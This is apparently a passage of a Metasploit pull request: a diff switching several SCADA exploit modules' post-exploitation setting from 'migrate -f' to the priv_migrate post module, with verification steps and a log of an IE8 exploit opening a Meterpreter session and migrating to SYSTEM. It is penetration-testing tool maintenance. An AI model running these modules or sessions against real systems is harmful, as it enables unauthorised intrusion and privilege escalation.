+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
         },
       'Platform'       => 'win',
       'Targets'        =>

--- a/modules/exploits/windows/scada/moxa_mdmtool.rb
+++ b/modules/exploits/windows/scada/moxa_mdmtool.rb
@@ -30,7 +30,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC' => 'thread',
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Payload'        =>
         {

--- a/modules/exploits/windows/scada/scadapro_cmdexe.rb
+++ b/modules/exploits/windows/scada/scadapro_cmdexe.rb
@@ -41,7 +41,7 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
       'DefaultOptions' =>
         {
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
         },
       'Platform'       => 'win',
       'Targets'        =>

--- a/modules/exploits/windows/scada/winlog_runtime.rb
+++ b/modules/exploits/windows/scada/winlog_runtime.rb
@@ -33,7 +33,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC' => 'process',
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
         },
       'Payload'        =>
         {


### PR DESCRIPTION
## Description

This fixes modules that use ```migrate -f``` after getting a session. ```migrate -f``` uses the old Meterpreter script, which has been deprecated, therefore we should be the post module version of it: post/windows/manage/priv_migrate

Fix #8002

## Verification

Although the PR is quite large, and it's not likely you will be able to test all the modules, you can probably just pick a few ones that you can test, and make sure the rest are using post/windows/manage/priv_migrate. For example:

- [x] Set up a Windows XP box with IE8 (no updates)
- [x] Start msfconsole
- [x] ```use exploit/windows/browser/ie_cbutton_uaf```
- [x] Configure the rest of the settings for the module
- [x] Visit the malicious link with the vulnerable IE8, and it should migrate without warning, like this:

```
sf exploit(ie_cbutton_uaf) > [*] Using URL: http://192.168.146.1:8080/HVOtrTa0WCU1h
[*] Server started.
[*] 192.168.146.173  ie_cbutton_uaf - Requesting: /HVOtrTa0WCU1h
[*] 192.168.146.173  ie_cbutton_uaf - Target selected as: IE 8 on Windows XP SP3
[*] 192.168.146.173  ie_cbutton_uaf - Sending HTML...
[*] Sending stage (957487 bytes) to 192.168.146.173
[*] Meterpreter session 1 opened (192.168.146.1:4444 -> 192.168.146.173:1176) at 2017-02-23 17:12:27 -0600
[*] Session ID 1 (192.168.146.1:4444 -> 192.168.146.173:1176) processing InitialAutoRunScript 'post/windows/manage/priv_migrate'
[*] Current session process is iexplore.exe (3368) as: SINN3R-4345996F\sinn3r
[*] Session is Admin but not System.
[*] Will attempt to migrate to specified System level process.
[*] Trying services.exe (736)
[+] Successfully migrated to services.exe (736) as: NT AUTHORITY\SYSTEM
```

- [x] For other modules, make sure they are using ```post/windows/manage/priv_migrate``` in the code.